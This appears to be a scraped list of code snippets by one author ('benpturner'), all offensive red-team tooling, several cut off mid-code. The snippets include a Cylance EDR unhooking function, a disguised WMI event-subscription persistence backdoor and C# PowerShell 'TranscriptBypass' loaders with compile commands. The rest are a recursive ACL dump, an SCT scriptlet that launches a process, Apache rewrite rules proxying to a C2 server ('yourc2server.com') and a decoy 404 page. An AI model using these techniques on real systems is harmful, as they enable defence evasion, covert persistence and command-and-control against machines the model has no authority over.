benpturner

function Unhook-Cylance() {
  
$winapi = @"
  using System.Runtime.InteropServices;
  using System;
  public class Win32 {
    [DllImport("msvcrt.dll", EntryPoint = "memcpy", CallingConvention = CallingConvention.Cdecl, SetLastError = false)]
    public static extern IntPtr memcpy(IntPtr dest, string src, uint count);
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);

benpturner

$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='IEUpdateNOW';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 9 AND TargetInstance.Minute= 30 GROUP WITHIN 60"}; $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{ name='IEUpdateNOW';CommandLineTemplate="powershell -e blah";RunInteractively='false'}; Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer} 
#https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-
Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-
Backdoor-wp.pdf

benpturner

([Security.Principal.WindowsIdentity]::GetCurrent());
$tl=@{Expression={((New-Object System.Security.Principal.SecurityIdentifier($_.Value)).Translate([System.Security.Principal.NTAccount])).Value};Label="Group Name";Width=400}; ([Security.Principal.WindowsIdentity]::GetCurrent()).Groups | FT $tl

benpturner

using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Security;
using System.Management.Automation.Runspaces;
using System.Reflection;

namespace TranscriptBypass
{
    // Compiling with CSC.exe v4.0.30319 or v3.5

benpturner

using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;

namespace TranscriptBypass
{
    // Compiling with CSC.exe v4.0.30319 or v3.5
    // C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll
    // C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll

benpturner

Get-ChildItem C:\ -Recurse -ErrorAction SilentlyContinue | ForEach-Object {try {Get-Acl -Path $_.FullName | Select-Object pschildname,pspath,accesstostring} catch{}}|Export-Csv C:\temp\acl.csv -NoTypeInformation

benpturner

<cOmPoNeNt><sCRipT>
a=new ActiveXObject("Shell.Application").ShellExecute("calc.exe","","","open","0");
</sCRipT></cOmPoNeNt>

benpturner

# whitelist need to be formatted like so
# 104.44.44.44 -
# 104.33.33.33 -

RewriteMap ips txt:/opt/whitelist.txt
RewriteCond ${ips:%%{REMOTE_ADDR}|NOTFOUND} !NOTFOUND
RewriteCond %%{HTTP_USER_AGENT} "Mozilla\/5\.0 \(Windows NT 6\.1; WOW64\) AppleWebKit\/537\.36 \(KHTML, like Gecko\)" [NC]
RewriteRule ^/news/(.*) https://yourc2server.com/news/$1 [NC,P]

benpturner

$serverport = '$port'

$httpresponse = '
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>

benpturner

using System;
using System.Text;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.EnterpriseServices;